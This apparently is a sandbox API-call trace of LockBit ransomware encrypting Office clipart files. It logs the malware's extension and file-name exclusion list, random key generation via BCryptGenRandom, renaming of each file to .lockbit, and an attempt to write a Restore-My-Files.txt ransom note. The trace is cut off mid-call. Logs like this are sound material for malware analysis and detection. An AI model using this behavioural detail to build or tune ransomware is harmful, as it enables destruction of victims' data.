[0154.389] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.389] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285484.WMF") returned 1 [0154.390] lstrcmpiW (lpString1="ntldr", lpString2="J0285484.WMF") returned 1 [0154.390] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285484.WMF") returned 1 [0154.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285484.WMF") returned -1 [0154.390] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285484.WMF") returned -1 [0154.390] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285484.WMF") returned 1 [0154.390] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285484.WMF") returned -1 [0154.390] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.390] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285484.WMF") returned=".WMF" [0154.390] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.390] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.390] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.391] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.391] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285484.WMF.lockbit") returned 72 [0154.391] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285484.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.392] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.392] malloc (_Size=0x40068) returned 0x3df0008 [0154.392] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9280) returned 1 [0154.392] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.392] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.392] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.393] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.393] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285484.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285484.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.396] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.396] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.397] free (_Block=0x1fa2ed8) [0154.397] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285484.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.397] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.398] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.398] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x795c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285780.WMF", cAlternateFileName="")) returned 1 [0154.398] lstrcmpiW (lpString1=".", lpString2="J0285780.WMF") returned -1 [0154.398] lstrcmpiW (lpString1="..", lpString2="J0285780.WMF") returned -1 [0154.398] PathFindExtensionW (pszPath="J0285780.WMF") returned=".WMF" [0154.398] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.398] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.399] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.399] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285780.WMF") returned 1 [0154.400] lstrcmpiW (lpString1="ntldr", lpString2="J0285780.WMF") returned 1 [0154.400] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285780.WMF") returned 1 [0154.400] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285780.WMF") returned -1 [0154.400] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285780.WMF") returned -1 [0154.400] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285780.WMF") returned 1 [0154.400] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285780.WMF") returned -1 [0154.400] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.400] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF") returned=".WMF" [0154.400] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.400] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.400] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.401] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.401] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF.lockbit") returned 72 [0154.401] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285780.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0154.402] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.402] malloc (_Size=0x40068) returned 0x3e70008 [0154.402] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=31068) returned 1 [0154.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0154.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0154.403] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0154.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.407] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.407] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.408] free (_Block=0x1fa2ed8) [0154.408] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.408] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.408] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.409] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56667970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x523e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285782.WMF", cAlternateFileName="")) returned 1 [0154.409] lstrcmpiW (lpString1=".", lpString2="J0285782.WMF") returned -1 [0154.409] lstrcmpiW (lpString1="..", lpString2="J0285782.WMF") returned -1 [0154.409] PathFindExtensionW (pszPath="J0285782.WMF") returned=".WMF" [0154.409] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.409] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.410] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.410] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285782.WMF") returned 1 [0154.411] lstrcmpiW (lpString1="ntldr", lpString2="J0285782.WMF") returned 1 [0154.411] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285782.WMF") returned 1 [0154.411] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285782.WMF") returned -1 [0154.411] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285782.WMF") returned -1 [0154.411] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285782.WMF") returned 1 [0154.411] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285782.WMF") returned -1 [0154.411] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.411] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF") returned=".WMF" [0154.411] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.411] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.411] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.412] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.413] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF.lockbit") returned 72 [0154.413] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285782.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0154.418] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.418] malloc (_Size=0x40068) returned 0x1ff1e60 [0154.418] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=21054) returned 1 [0154.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0154.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0154.419] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0154.422] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program 